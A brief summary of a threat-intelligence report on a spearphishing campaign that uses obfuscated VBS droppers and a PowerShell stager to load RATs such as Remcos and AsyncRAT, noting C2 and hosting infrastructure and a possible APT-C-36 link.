Unmasking the Infrastructure of a Spearphishing Campaign

A cluster of 16 open directories hosting heavily obfuscated Visual Basic Script droppers (notably files named "sostener.vbs") were analyzed and found to implement a three-stage installer: VBS -> dynamically generated PowerShell stager -> memory injector -> in-memory RAT execution. Observed payloads include Remcos (multiple strains), LimeRAT, DCRat, and AsyncRAT, with C2 infrastructure using duckdns.org dynamic domains, TLS certificate pivoting, and payload hosting on paste.ee, Bitbucket, and archive.org; the report lists extensive IOCs and suggests a possible but unconfirmed link to APT-C-36.